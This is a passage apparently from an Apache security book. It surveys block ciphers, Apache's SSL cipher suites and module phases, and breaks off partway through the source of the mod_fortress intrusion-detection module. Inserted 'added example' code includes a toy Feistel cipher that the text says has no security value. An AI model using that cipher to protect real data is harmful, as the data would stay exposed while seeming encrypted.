Znkvzhz Ncnpur Frphevgl
Maximum Apache Security


The chief advantage of ROT-13-style ciphers is that they obscure the original letters 
used. Hence, attackers cannot decode the message as they would with an anagram 
(by rearranging letter positioning). They must instead deduce your original shifting 
formula, which is more difficult. 


Simple substitution ciphers are too rudimentary to protect data, though. So, over the 
centuries (and particularly in the last 100 years), researchers have developed many 
different cipher types. Initially, these ciphers were simple enough that human 
beings, spending hours or days, could ascertain what algorithm researchers used. 
However, as computers emerged that could perform millions of calculations per 
second, the demand for stronger encryption increased. 


NOTE 


People still use substitution ciphers for some tasks, though. One is to ensure that a Web
page's contents or a Usenet post's text drops out of traditional Web crawler indexing
procedures. Web crawlers trigger indexing based on pattern searching (regular expression or
regex evaluation) and therefore miss ROT-13 encoded paragraphs or documents. This sounds
silly, but it isn't. Many firms now use both humans and robots to search hacking forums and
IRC channels for recent revelations in the cracking community. One such firm has 40 people
working in shifts operating 24 hours a day to cull such information from several hundred
sources and sell it to customers who maintain large networks. Because most such searches are
now automated, some crackers pass code in ROT-13, thus buying an extra few hours before
their new utility hits the aboveground wires at security sites around the globe. One group I
know personally even applied ROT-13 to certain portions of its Web site, because documents
that were in the "allowed" category (and were, therefore, indexable via robots) housed data
they didn't want indexed.





Today, we know of hundreds of ciphers, and many of these have very specialized 
uses. However, in relation to Apache and most network applications, the most 
common cipher type is the block cipher. 


Block Ciphers 


Block ciphers are ciphers that work on determinate blocks of data, and determinate
in this instance refers to their size. That is, block ciphers operate on data blocks of a
fixed size (64 bits in many cases). Such ciphers also typically use only one secret,
shared key (commonly 56, 64, or 128 bits long) and involve successive rounds of
one or another nonlinear mathematical function. In each round, one half of the
block is fed through such a function and the result is combined with the other half
by XOR (exclusive-or). This structure, which modern crypto folks call "the Feistel
structure" after its inventor, IBM's Horst Feistel, is fast, easy, and efficient.


NOTE 


For an excellent overview on block ciphers that includes process model diagrams of
substitution, permutation, and other operations of many popular block ciphers, check Bill
Stallings' "Modern Private Key Ciphers Part 1," located at
http://williamstallings.com/Extras/Security-Notes/lectures/blockA.html. Part 2 can
be found at http://www.williamstallings.com/Extras/Security-Notes/lectures/blockB.html.





Popular block ciphers in use today include the following: 


• 3-Way—3-Way is a fast cipher from Joan Daemen. 3-Way uses a 96-bit key
length and a 96-bit block length, it's an iterated block cipher, and it repeats
several operations in a specified number of rounds. (Side note: Counterpane
Systems has developed a key attack on 3-Way.) To learn more, download
"Related-Key Cryptanalysis of 3-WAY, Biham-DES, CAST, DES-X, NewDES, RC2,
and TEA," by John Kelsey, Bruce Schneier, and David Wagner at
http://www.cs.berkeley.edu/~daw/papers/keysched-icics97.ps. (This document
requires a PostScript viewer.)

• Blowfish—Designed by Bruce Schneier in 1994, Blowfish is a 64-bit, 16-round
Feistel block cipher that uses a variable length key. Mr. Schneier developed
Blowfish for bulk data encryption. It uses four 8x32-bit random substitution
boxes generated from the key, the output of which is combined using simple
addition and XOR. SSH can use Blowfish. Learn more about Blowfish at
http://www.counterpane.com/blowfish.html.

• CAST—CAST is a 64-bit, 8-round Feistel block cipher with a 64-bit key, designed
by C. Adams and S. Tavares. It uses six 8x32-bit substitution boxes and
combines output with XOR. CAST is popular in Canada, and supported by
many networking applications. Learn more about CAST by downloading "The
CAST-256 Encryption Algorithm" by Carlisle Adams, located here:
http://www.entrust.com/resources/pdf/cast-256.pdf.

• DEAL—DEAL uses a 128-bit block and can handle 128-bit, 192-bit, and 256-bit
key lengths. It uses DES as its inner-round function (default rounds equal six,
but it's safer with eight). To read some interesting perspectives on cracking
DEAL, download "DEAL—A 128-bit Block Cipher" by Lars R. Knudsen, located
at http://www.ii.uib.no/~larsr/papers/deal.ps. (This document requires a
Zip utility and a PostScript viewer.)

• RC2 and RC5—RC2 and RC5 are two private key block ciphers developed by
Ron Rivest of RSA Data Security, Inc. RC2 and RC5 implementations, although
popular and present in many Web clients such as Netscape Navigator, are not
fully published (RSA is a commercial enterprise). RC4, a cousin of these, was
published, however, though not formally. Learn more about RC5 and related
algorithms at ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/rc5.ps.Z.
(This document requires a Zip utility and a PostScript viewer.)

• DES—DES (the Data Encryption Standard, discussed in more detail later in this
chapter) uses a 64-bit data block and a 56-bit key. Learn more about DES at
http://www.itl.nist.gov/div897/pubs/fip46-2.htm.

• FEAL—FEAL is a 64-bit, 32-round (maximum) Feistel block cipher with a 64- or
128-bit key from Shimizu and Miyaguchi of NTT (Nippon Telegraph and
Telephone). FEAL exists in not merely software, but hardware as well, and isn't
intended to stand up to exhaustive attack.

• GOST—GOST is DES' Russian counterpart. It uses a 256-bit key and runs 32
rounds. Find more information on GOST in the "Government Standard of the
U.S.S.R. Cryptographic Protection for Data Processing Systems, Cryptographic
Transformation Algorithm" (a translation from the original Russian specification)
at http://www.jetico.sci.fi/gost.zip. Note: This file is zipped. When
you unzip it, you'll see two files (Russian and Russian-1). These are
PostScripts, but have no file extension. Rename these Russian.ps and
Russian1.ps and open them in a PostScript-enabled viewer.

• IDEA—IDEA (International Data Encryption Algorithm) is a 64-bit, 8-round
block cipher with a 128-bit key from X. Lai and J. Massey. IDEA is today
embedded in SSH, PGP, and other popular tools.

• LOKI91—LOKI91 is a 64-bit, 16-round, symmetric block cipher with a 64-bit
key designed by Brown, Pieprzyk, and Seberry. Learn more about LOKI at
ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/rijmen/loki97.ps.gz. (This document
requires a Zip utility and a PostScript viewer.)

• Lucifer—Lucifer was likely the earliest modern cryptographic algorithm of the
block cipher variety. Horst Feistel designed it in the 1960s, and it shares some
characteristics with DES. Lucifer is a precursor to DES. To read a study on
Lucifer, go to http://www.cs.technion.ac.il/~biham/Reports/cs782.ps.gz.
(Gzip and PostScript required.)

• SAFER—SAFER is a 64-bit, 6 or higher-round, iterated block cipher with 64- or
128-bit keys, designed by J. Massey. Learn more about SAFER here:
ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/trunc_dif_saf.ps.Z.
(Gzip and PostScript required.)

• SQUARE—SQUARE is a 128-bit, 8-round block cipher by Joan Daemen and
Vincent Rijmen, and is reportedly resistant to differential and linear
cryptanalysis. Learn more about SQUARE at
http://www.esat.kuleuven.ac.be/~rijmen/square/index.html.

• TEA—TEA (Tiny Encryption Algorithm) is a 64-bit, 32-round Feistel block
cipher with a 128-bit key from Wheeler & Needham. It uses a round function
that alternates additions with XOR. Find out more at
http://www.cs.berkeley.edu/~daw/papers/keysched-icics97.ps. (This document
requires a PostScript viewer.)


Block ciphers now operate in not merely super, mini, micro, and personal
computers, but also many mobile devices and "embedded" environments, including
handhelds.


NOTE 

One paper that throws an interesting perspective on this is "The Performance Measurement
of Cryptographic Primitives on Palm Devices," by Duncan S. Wong, Hector Ho Fuentes, and
Agnes Chan at Northeastern University.

This is a good study on security versus performance and overhead, and sheds light on
optimization. Download the PDF file here: http://www.acsac.org/2001/papers/25.pdf.


The following list points to important documents that lay bare the secrets of block 
ciphers. 


• "Differential Cryptanalysis of DES-like Cryptosystems," Eli Biham and Adi
Shamir. http://www.cs.technion.ac.il/~biham/Reports/Weizmann/cs90-16.ps.gz.
(Gzip and PostScript required.)

• "Differential Cryptanalysis of Lucifer," Ishai Ben-Aroya and Eli Biham.
http://link.springer.de/link/service/journals/00145/bibs/9n1p21.html.

• "Differential Cryptanalysis of the Full 16-round DES."
www.infosec.com/crypto/CS0708.ps.gz. (Gzip and PostScript required.)

• "Markov Ciphers and Differential Cryptanalysis," Xuejia Lai, James Massey, and
Sean Murphy. http://www.cs.rhbnc.ac.uk/~sean/xuejia.ps. (PostScript
required.)

• "Provable Security Against a Differential Attack," Kaisa Nyberg and Lars
Knudsen. ftp://ftp.esat.kuleuven.ac.be/pub/COSIC/knudsen/jourpap.ps.Z.
(Zip utility and PostScript required.)

• "Tutorial on Linear and Differential Cryptanalysis," Howard Heys.
http://www.engr.mun.ca/~howard/PAPERS/ldc_tutorial.ps. (PostScript
required.)


Let’s look at a few block ciphers Apache supports. 


DES 


The Data Encryption Standard (DES) is arguably history’s most popular cipher, even 
though it’s been around a mere 27 years. 


In the 1970s, the U.S. government already used several ciphers in classified, secret, 
and top secret environments. However, it lacked a standardized encryption method 
for more general use. In 1973, the National Bureau of Standards attempted to 
remedy that. 


Federal Information Processing Standards Publication 74: Guidelines for Implementing 
and Using the NBS Data Encryption Standard explains: 


Because of the unavailability of general cryptographic technology outside the national security
arena, and because security provisions, including encryption, were needed in unclassified
applications involving Federal Government computer systems, NBS initiated a computer
security program in 1973 which included the development of a standard for computer data
encryption. Since Federal standards impact on the private sector, NBS solicited the interest
and cooperation of industry and user communities in this work.


Many companies developed proposals, but IBM prevailed. IBM's DES survived
rigorous testing, and by 1977, the National Bureau of Standards and the National
Security Agency endorsed it. Since then, DES has been the de facto algorithm used in
unclassified environments and many operating system password schemes (including
Unix variants).


Both encryption and decryption functions rely on a key, without which
unauthorized users cannot decrypt a DES-encrypted message. This key (derived from
the user's typed password and some padded information, as discussed later) consists
of 64 binary digits (0s and 1s). 56 bits are used in encryption, and 8 are used in error
checking. The total number of possible keys is therefore quite high: If the complete
64-bit input is used (i.e., none of the input bits should be predetermined from block
to block) and if the 56-bit variable is randomly chosen, no technique other than
trying all possible keys using known input and output for the DES will guarantee
finding the chosen key. As there are over 70,000,000,000,000,000 (70 quadrillion)
possible keys of 56 bits....

DES, as a block cipher, works on data in 64-bit blocks. Data that exceeds this fixed
size is broken into 64-bit fragments, and any remaining portion shorter than 64 bits
is then padded. Padding is when DES adds insignificant bits to smaller parts to
achieve a complete 64-bit block.


From here, DES performs three important operations, the first of which is the initial 
permutation. In permutation, data bits are shifted to different positions in a table. 
Through this initial permutation, DES derives an input block. The input block is then 
scrambled by complex mathematical operations (a process called transformation) to 
produce a pre-output block. Finally, the pre-output block is subjected to still another 
permutation, and the final result is the scrambled text, sometimes called encrypted 
text but more accurately referred to as encoded text. 
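As an added example (not code from the book), the following C program builds a toy 64-bit block cipher with the shape just described for DES and, earlier, for the Feistel structure: an initial permutation, 16 rounds in which one half of the block drives a nonlinear round function whose output is XORed into the other half, a final permutation, and padding of a message into whole 64-bit blocks. The permutations, key schedule and round function are simplified stand-ins for DES's tables (the cipher has no security value), and the padding scheme is an assumption (PKCS#7-style), since the book does not say which one DES users apply; the point is that decryption is the same routine with the subkeys in reverse order.

```c
/* Added example, not from the book: a toy DES-shaped Feistel block cipher.
 * Permutations, key schedule and round function are simplified stand-ins for
 * DES's tables and give no real security; the structure is the point. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ROUNDS 16
#define BLOCK_BYTES 8

static uint32_t rotl32(uint32_t x, unsigned n) { return (x << n) | (x >> (32 - n)); }

/* Key schedule: one 32-bit subkey per round from the 56 low key bits (the other
 * 8 bits are ignored, as DES ignores its parity bits). */
static void key_schedule(uint64_t key, uint32_t subkeys[ROUNDS]) {
    const uint64_t mask56 = 0x00FFFFFFFFFFFFFFULL;
    uint64_t k = key & mask56;
    for (int r = 0; r < ROUNDS; r++) {
        k = ((k << 7) | (k >> 49)) & mask56;   /* rotate inside the 56 bits */
        subkeys[r] = (uint32_t)(k ^ (k >> 24)) ^ (0x9E3779B9u * (uint32_t)(r + 1));
    }
}

/* Round function F: the subkey is mixed into one half with nonlinear steps. */
static uint32_t round_function(uint32_t half, uint32_t subkey) {
    uint32_t x = (half ^ subkey) * 0x45D9F3Bu;   /* multiply: nonlinear over the bits */
    x ^= rotl32(x, 13);
    x += 0x7F4A7C15u;
    return x ^ rotl32(x, 7);
}

/* Stand-ins for DES's initial and final permutations: a rotation and its inverse. */
static uint64_t initial_perm(uint64_t b) { return (b << 23) | (b >> 41); }
static uint64_t final_perm(uint64_t b)   { return (b >> 23) | (b << 41); }

/* Feistel core: each round feeds the right half to F, XORs the result into the
 * left half, then swaps. Decryption is the same routine with subkeys reversed. */
uint64_t toy_feistel(uint64_t block, uint64_t key, int decrypt) {
    uint32_t subkeys[ROUNDS];
    key_schedule(key, subkeys);
    block = initial_perm(block);
    uint32_t left = (uint32_t)(block >> 32), right = (uint32_t)block;
    for (int r = 0; r < ROUNDS; r++) {
        uint32_t k = decrypt ? subkeys[ROUNDS - 1 - r] : subkeys[r];
        uint32_t next_right = left ^ round_function(right, k);
        left = right;
        right = next_right;
    }
    /* Leave the last swap undone (as DES does) so the routine inverts itself. */
    return final_perm(((uint64_t)right << 32) | left);
}

/* Pad to whole 64-bit blocks, PKCS#7-style (assumed, not from the book): every
 * pad byte holds the pad length; a full pad block is added when len % 8 == 0. */
size_t pad_message(const uint8_t *msg, size_t len, uint8_t *out) {
    size_t pad = BLOCK_BYTES - (len % BLOCK_BYTES);
    memcpy(out, msg, len);
    memset(out + len, (int)pad, pad);
    return len + pad;
}

/* Strip that padding; returns (size_t)-1 if it is malformed. */
size_t unpad_message(const uint8_t *buf, size_t len) {
    if (len == 0 || len % BLOCK_BYTES != 0) return (size_t)-1;
    uint8_t pad = buf[len - 1];
    if (pad == 0 || pad > BLOCK_BYTES) return (size_t)-1;
    for (size_t i = 0; i < pad; i++)
        if (buf[len - 1 - i] != pad) return (size_t)-1;
    return len - pad;
}

/* Encrypt or decrypt a padded buffer block by block, each block independent as
 * the text describes (real deployments chain blocks, e.g. the CBC suites). */
static void ecb_crypt(uint8_t *buf, size_t len, uint64_t key, int decrypt) {
    for (size_t off = 0; off < len; off += BLOCK_BYTES) {
        uint64_t b;
        memcpy(&b, buf + off, BLOCK_BYTES);
        b = toy_feistel(b, key, decrypt);
        memcpy(buf + off, &b, BLOCK_BYTES);
    }
}

/* 1 if pad -> encrypt -> decrypt -> unpad reproduces msg and the ciphertext
 * differs from the padded plaintext, else 0. */
int roundtrip_ok(const char *msg, uint64_t key) {
    uint8_t plain[256], cipher[256];
    size_t len = strlen(msg);
    if (len + BLOCK_BYTES > sizeof plain) return 0;
    size_t plen = pad_message((const uint8_t *)msg, len, plain);
    memcpy(cipher, plain, plen);
    ecb_crypt(cipher, plen, key, 0);
    if (memcmp(cipher, plain, plen) == 0) return 0;
    ecb_crypt(cipher, plen, key, 1);
    return unpad_message(cipher, plen) == len && memcmp(cipher, msg, len) == 0;
}

int main(void) {
    /* Constructed sample key and message; 23 bytes pad to three blocks. */
    uint64_t key = 0x0123456789ABCDEFULL;
    printf("round trip %s\n", roundtrip_ok("Maximum Apache Security", key) ? "ok" : "FAILED");
    return 0;
}
```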


NOTE 


If you want specifics (including mathematical formulas) on how DES arrives at encrypted text, 
see the resource links at the end of this chapter or go to 

http://www.itl.nist.gov/div897/pubs/fip46-2.htm. Linux's implementation of DES is
crypt(3), an enhanced, high-speed efficient DES implementation available in libdes from Eric 
Young. You'll find that many security programs use or incorporate libdes, including Secure 
Shell. 





RC2 


Another popular block cipher is RC2 (created by Ron Rivest, from whence the cipher 
derives its name, “Ron’s Code”). As explained by RSA Data Security, for whom Rivest 
designed RC2, RC2 


...has a block size of 64 bits and is about two to three times faster than DES in software. An
additional string (40 to 88 bits long) called a salt can be used to thwart attackers who try to
precompute a large look-up table of possible encryptions. The salt is appended to the
encryption key, and this lengthened key is used to encrypt the message. The salt is then sent,
unencrypted, with the message. RC2 and RC4 have been widely used by developers who want to
export their products; more stringent conditions have been applied to DES exports.


Source: RSA Cryptography FAQ, Section 3.6.2, RC2,
http://www.rsasecurity.com/rsalabs/faq/3-6-2.html.


To learn more about RC2 and its design, see RFC 2268, located here: 
ftp://ftp.nordu.net/rfc/rfc2268.txt. 


NOTE 


RC2 can be cracked. Get Counterpane Labs' Windows 95-compatible S/MIME 40-bit RC2
Cracking Screensaver at http://www.counterpane.com/smime-download.html.
MD5

Beyond digest-based authentication that's already built in, Apache supports MD5
(discussed in Chapter 11) through modules and other utilities. They include the
following:

• Apache-Session from Jeffrey Baker offers a sprawling assortment of tools,
including Apache::Session::Generate::MD5, which uses MD5 to create
random object IDs. Get it at
http://www.cpan.org/authors/id/JBAKER/Apache-Session-1.54.tar.gz.

• Apache-SessionX from Gerald Richter provides an extended persistence
framework for session data, including Apache::SessionX::Generate::MD5, which
uses MD5 to create random object IDs. Get it at
http://www.cpan.org/authors/id/GRICHTER/Apache-SessionX-2.00b3.tar.gz.

• FrogDot from Heinz Richter provides realm and MD5 digest-based cookie
authentication for document trees (and fast login for users using MD5-signed
cookies). Get it at http://www.frogdot.org.


SSL

Apache supports SSL (covered in Chapter 15, “Apache/SSL”), and not merely through
Apache-SSL. Modules exist that either help Apache facilitate SSL support or piggyback
on other utilities that do. They include the following:

• Covalent Raven SSL, from Covalent Technologies, is a commercial package that
  provides the capability to easily secure Web transactions via both SSL and TLS.
  Get it at www.covalent.net/products/ssl/.

• mod_auth_oracle/win32, from Karsten Pawlik and Serg Oskin, is a module for
  authenticating against an Oracle8.x.x database, which works with mod_ssl. Get
  it at
  http://www.designlab.de/service_support/downloads/downloads/mod_auth_oracle.zip.

• mod_authz_ldap from Andreas Mueller provides SSL-wrapped LDAP authorization
  and certificate verification (if you have mod_ssl). Get it at
  http://authzldap.othello.ch.

• mod_ssl from Ralf S. Engelschall provides a free Apache interface to SSLeay
  (free SSL, essentially). Get it at http://www.modssl.org/.

• Whitebeam, from The Whitebeam Project, provides an SSL-enabled, XML-based
  rapid design environment for dynamic Web content. Get it at
  http://www.whitebeam.org/.
Other Ciphers

Through Apache-SSL, Apache can support several ciphers, and even several versions
of specific ones. Table 17.1 describes them and their bit levels.

TABLE 17.1 Apache-SSL Cipher Support

Function                     Bits    Encrypted Bits
ADH-DES-CBC3-SHA             168     168
ADH-DES-CBC-SHA               56      56
ADH-RC4-MD5                  128     128
DES-CBC3-MD5                 168     168
DES-CBC3-SHA                 168     168
DES-CBC-MD5                   56      56
DES-CBC-SHA                   56      56
DES-CFB-M1                    56      56
DH-DSS-DES-CBC3-SHA          168     168
DH-DSS-DES-CBC-SHA            56      56
DH-RSA-DES-CBC3-SHA          168     168
DH-RSA-DES-CBC-SHA            56      56
EDH-DSS-DES-CBC3-SHA         168     168
EDH-DSS-DES-CBC-SHA           56      56
EDH-RSA-DES-CBC3-SHA         168     168
EDH-RSA-DES-CBC-SHA           56      56
EXP-ADH-DES-CBC-SHA          128      40
EXP-ADH-RC4-MD5              128      40
EXP-DES-CBC-SHA               56      40
EXP-DH-DSS-DES-CBC-SHA        56      40
EXP-DH-RSA-DES-CBC-SHA        56      40
EXP-EDH-DSS-DES-CBC-SHA       56      40
EXP-EDH-RSA-DES-CBC           56      40
EXP-RC2-CBC-MD5              128      40
EXP-RC4-MD5                  128      40
FZA-FZA-CBC-SHA               -1      -1
FZA-NULL-SHA                   0       0
FZA-RC4-SHA                  128     128
IDEA-CBC-MD5                 128     128
IDEA-CBC-SHA                 128     128
NULL                           0       0
NULL-MD5                       0       0
NULL-SHA                       0       0
RC2-CBC-MD5                  128     128
RC4-64-MD5                    64      64
RC4-MD5                      128     128
RC4-SHA                      128     128
Summary

Configuration of ciphers other than SSL and MD5 is beyond the scope of this book.
For general knowledge of ciphers and cryptology, I recommend Decrypted Secrets:
Methods and Maxims of Cryptology by Friedrich Ludwig Bauer (Springer Verlag).
Apache’s modular design admittedly makes these tasks easier. Native Apache
modules handle many problems that developers normally must address alone. Let’s
briefly review how Apache transactions unfold, and which procedures Apache’s
native modules address.

Apache Transactions in Brief

As discussed in Appendix D, “Apache API Quick Reference,” Apache traverses
several phases as it handles a request. These include, but need not be
limited to, the following:

• The connection
• URI handling
• Auth and user identification
• Access checking
• MIME handling
• The response
• Logging

Your first task is to figure out where in that sequence your module will intervene (or
whether it will cancel out any of the previously described phases, a contingency I
don’t recommend, but you could have reasons for it). Figure 18.1 illustrates the
phases Apache traverses.

However, to a module developer, a somewhat pared-down phase representation is
more useful, as illustrated in Figure 18.2.

In this structure, you’ll consider intervening or integrating your own work at several
points. Of these, one important component is your command table, which communicates
the commands your module recognizes and passes them to Apache, as shown in
Figure 18.3.

Command Table Structures

Typically, you’ll add a command table structure, which Apache will configure and
integrate before it handles a request.
FIGURE 18.1 Apache’s phases. (Figure not reproduced. It lists, phase by phase, the
modules mod_include, mod_cgi, mod_cgid, mod_actions; mod_headers, mod_cern_meta,
mod_expires, mod_asis; and mod_log_config, mod_usertrack.)

FIGURE 18.2 Apache’s basic phases. (Figure not reproduced.)

FIGURE 18.3 Apache’s command-handling phase. (Figure not reproduced. Its phases
and annotations are: initialization, “internal Apache startup”; command handler and
translate handler, “establish commands and translation conventions”, with the
command tables feeding the command handler; user auth check and user access check,
“handle essential security controls”; type checker and fixer_upper, “content type,
charset, etc.”; content handling and logging, “do it and log it”; additional
handlers.)


Command tables describe and define your module’s commands. Your module passes
its command table to the command handler. A typical command table looks like
this, taken from mod_log_config.c:

static const command_rec config_log_cmds[] =
{
    AP_INIT_TAKE23("CustomLog", add_custom_log, NULL, RSRC_CONF,
                   "a file name, a custom log format string or format name, "
                   "and an optional \"env=\" clause (see docs)"),
    AP_INIT_TAKE1("TransferLog", set_transfer_log, NULL, RSRC_CONF,
                  "the filename of the access log"),
    AP_INIT_TAKE12("LogFormat", log_format, NULL, RSRC_CONF,
                   "a log format string (see docs) and an optional format name"),
    AP_INIT_TAKE1("CookieLog", set_cookie_log, NULL, RSRC_CONF,
                  "the filename of the cookie log"),
    {NULL}
};

Notice that the leading strings match the directives CustomLog, TransferLog,
LogFormat, and CookieLog.
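As an added illustration (not Apache’s own code, and not from mod_log_config.c), here is a self-contained, table-driven directive parser in the style of command_rec. It shows what the command handler does with a table like the one above: it looks the directive up by name, checks that the number of arguments fits the entry’s TAKE1/TAKE23 declaration before any handler runs, and only then calls the handler. The srv_config struct, handle_line(), and the error strings are this example’s own.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Argument-count classes, mirroring the AP_INIT_TAKE* macros above. */
enum args_how { NO_ARGS, TAKE1, TAKE12, TAKE23 };

/* Hypothetical per-server configuration filled in by the handlers. */
struct srv_config {
    char transfer_log[128];
    char custom_log[128];
    char custom_fmt[64];
};

typedef const char *(*cmd_func)(struct srv_config *cfg, int argc, char **argv);

/* One row of the table: directive name, handler, arity, error text. */
struct command_rec {
    const char *name;
    cmd_func func;
    enum args_how args;
    const char *errmsg;
};

static const char *set_transfer_log(struct srv_config *cfg, int argc, char **argv) {
    (void)argc;
    snprintf(cfg->transfer_log, sizeof cfg->transfer_log, "%s", argv[0]);
    return NULL;
}

static const char *add_custom_log(struct srv_config *cfg, int argc, char **argv) {
    snprintf(cfg->custom_log, sizeof cfg->custom_log, "%s", argv[0]);
    snprintf(cfg->custom_fmt, sizeof cfg->custom_fmt, "%s", argc > 1 ? argv[1] : "common");
    return NULL;
}

static const struct command_rec cmds[] = {
    {"TransferLog", set_transfer_log, TAKE1, "the filename of the access log"},
    {"CustomLog", add_custom_log, TAKE23, "a file name, a format, and an optional env= clause"},
    {NULL, NULL, NO_ARGS, NULL}
};

/* 1 if argc is acceptable for the entry's declared arity. */
static int args_ok(enum args_how how, int argc) {
    switch (how) {
    case NO_ARGS: return argc == 0;
    case TAKE1:   return argc == 1;
    case TAKE12:  return argc == 1 || argc == 2;
    case TAKE23:  return argc == 2 || argc == 3;
    }
    return 0;
}

/* Dispatch one configuration line through the table. Returns NULL on
 * success or an error string; directive names match case-insensitively. */
const char *handle_line(struct srv_config *cfg, const char *line) {
    char buf[256];
    char *argv[4];
    int argc = 0;
    snprintf(buf, sizeof buf, "%s", line);
    char *tok = strtok(buf, " \t\r\n");
    if (!tok) return "empty line";
    const char *name = tok;
    while ((tok = strtok(NULL, " \t\r\n")) != NULL) {
        if (argc == 4) return "too many arguments";
        argv[argc++] = tok;
    }
    for (const struct command_rec *c = cmds; c->name; c++) {
        if (strcasecmp(c->name, name) != 0) continue;
        if (!args_ok(c->args, argc)) return c->errmsg;   /* arity checked before the handler runs */
        return c->func(cfg, argc, argv);
    }
    return "unknown directive";
}
```

The point of the arity column is that a handler such as set_transfer_log() can index argv[0] without checking: the table, not each handler, guarantees the argument count.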


Content Handlers

Another area where your module will likely intervene is in content handling, as in
Figure 18.4.

FIGURE 18.4 Apache’s content-handling phase. (Figure not reproduced. It repeats the
phase diagram of Figure 18.3 and annotates the content-handling phase with “content
handlers communicate ways to manipulate data.”)





Some sample content-handling modules that intervene here include the following:

• mod_actions—Provides support for executing CGI scripts based on media type
  or request method.
• mod_cgi—Provides support for invoking CGI scripts.
• mod_cgid—Provides support for invoking CGI scripts using an external
  daemon.
• mod_ext_filter—Provides support for filtering content with external
  programs.
• mod_include—Provides support for server-parsed documents.
• mod_isapi—Provides Windows ISAPI Extension support.
• mod_suexec—Provides support for running CGI requests as a specified user and
  group.


mod_include.c, for example (which handles includes), has functions that interpret,
validate, and execute SSI directives:

if(ssi_pfn_register) {
    ssi_pfn_register("if", handle_if);
    ssi_pfn_register("set", handle_set);
    ssi_pfn_register("else", handle_else);
    ssi_pfn_register("elif", handle_elif);
    ssi_pfn_register("echo", handle_echo);
    ssi_pfn_register("endif", handle_endif);
    ssi_pfn_register("fsize", handle_fsize);
    ssi_pfn_register("config", handle_config);
    ssi_pfn_register("include", handle_include);
    ssi_pfn_register("flastmod", handle_flastmod);
    ssi_pfn_register("printenv", handle_printenv);
}

These correspond to SSI directives that Webmasters embed in HTML documents. For
each such directive, mod_include.c provides a handler function. For example,
handle_include() fetches the file specified, and inserts it into the returned page
(output).


Defining Your Module’s Purpose

Essentially, then, you must define what your module does, plot out its process
model, and graft that model to Apache’s phase model. From this, you’ll determine
how your module plugs into Apache, what it does, and where potential security
issues might arise.

Deciding what module type to create is a task in itself, of course. As you’ll see in
Appendix F, “What’s on the CD-ROM,” developers have already created a staggering
number of modules that perform every type of function imaginable (more than 345
Apache modules exist).

Chances are, you’ll create a module that performs one or more of the following
tasks:

• URI handling
• User ID, authentication, and access
• MIME-type handling
• Response header handling
• Dynamic content handling
• Logging

We’ll look at one such module (mod_fortress) that provides logging and filtering.


mod_fortress: An Example 


mod_fortress, which supports Apache 1.3.12 on Linux, NetBSD, and OpenBSD, 
provides the following features: 


e Custom logging 


e Detects common CGI/HTTP security requests and scans 




• Detects known Anti-IDS evasive scanning methods (Whisker, twwwscan,
  VoidEye, and so on)

• Integrated SSL support

• The capability to act as a nontransparent proxy to modify specific requests
  (such as CGI return error codes)


mod_fortress’ Source Code 


The following is mod_fortress’ source code, with long lines truncated to fit on the 
printed page. In all other respects, the source is unaltered: 


/*************************************************************************

    mod_fortress

    Apache Application Intrusion Detection System & Firewall Copyright
    (c) 2000 Interstellar <io@spunge.org> This program is free software;
    you can redistribute it and/or modify it under the terms of the GNU
    General Public License as published by the Free Software Foundation;
    version 2.

    This program is distributed in the hope that it will be useful, but
    WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
    or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
    for more details.

    You should have received a copy of the GNU General Public License along
    with this program; if not, write to the Free Software Foundation, Inc.,
    59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
    You may copy and distribute this code as long as this copyright
    and disclaimer remains intact.

*************************************************************************/

/** configuration defines **/

// enable non-transparent proxy
#define RUN_FORTRESS_IN_THE_MIDDLE

// enable logging ?
#define RUN_LOGGER

// show text banner in Server: header ?
// #define SHOW_VERSION_COMPONENT

/** !configuration defines **/
#define BUFFER 1000
#define MODULE_RELEASE "mod_fortress/0.4"


#include "httpd.h" 
#include "http_core.h" 
#include "http_log.h" 
#include "http_main.h" 
#include "http_request.h" 
#include "http_protocol.h" 
#include "http_config.h" 


module MODULE_VAR_EXPORT fortress_module; 


/* the structs that "which are NOT for sissies" */
struct ParseOps {
    char ParsedURI[BUFFER];
    char ParsedCode[BUFFER];
    char ParsedDesc[BUFFER];
};

struct openflags {
    int flags;
    mode_t mode;
};

typedef struct {
    array_header *scripts;
} FortressOps;

typedef struct {
    int log_fd;             /* file descriptor */
    char *logname;          /* log filename */
    char *format_string;
} LogOps;


static void *fortress_create_srv_config(pool *p, server_rec *s)
{
    LogOps *cls = (LogOps *)ap_palloc(p, sizeof(LogOps));
    cls->logname = "";
    return (void *)cls;
}

static const char *fortress_config_logfile(cmd_parms *parms,
                                           void *mconfig, char *arg)
{
    LogOps *cls = (LogOps *)ap_get_module_config
                  (parms->server->module_config, &fortress_module);
    cls->logname = arg;
    return NULL;
}

static const char *fortress_config_log_string(cmd_parms *parms,
                                              void *mconfig, char *arg)
{
    LogOps *cls = (LogOps *)ap_get_module_config(parms->server->
                  module_config, &fortress_module);
    cls->format_string = arg;
    return NULL;
}

static void *fortress_create_dir_config(pool *p, char *path)
{
    FortressOps *cfg = (FortressOps *)ap_palloc(p, sizeof(FortressOps));
    cfg->scripts = ap_make_array(p, 10, sizeof(char *));
    return (void *)cfg;
}

/*
 * get query args if any
 */
static const char *get_args(request_rec *r)
{
    return (r->args != NULL) ? ap_pstrcat(r->pool, "?", r->args,
                                          NULL) : " ";
}


static const char *get_hin(request_rec *r, char *hin)
{
    if(ap_table_get(r->headers_in, hin))
        return ap_table_get(r->headers_in, hin);
    return " ";
}

char *
strupper(char *uri)
{
    char astr[] = "abcdefghijklmnopqrstuvwxyz";
    char bstr[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int i, j;
    for(i = 0; i < strlen(astr); i++) {
        for(j = 0; j < strlen(uri); j++) {
            if(uri[j] == astr[i]) {
                uri[j] = bstr[i];
            }
        }
    }
    return uri;
}

char *
strwdel(char *uri)
{
    int i;
    for(i = 0; i < strlen(uri); i++) {
        if(uri[i] == '\\') {
            uri[i] = '/';
        }
    }
    return uri;
}

/*
 * parse request uri from httpd.conf
 */
void
parse_uri(char *uri, char *dst)
{
    int i;
    ap_snprintf(dst, 100, "%s", uri);
    for(i = 0; i < strlen(dst); i++) {
        if(dst[i] == ';') {
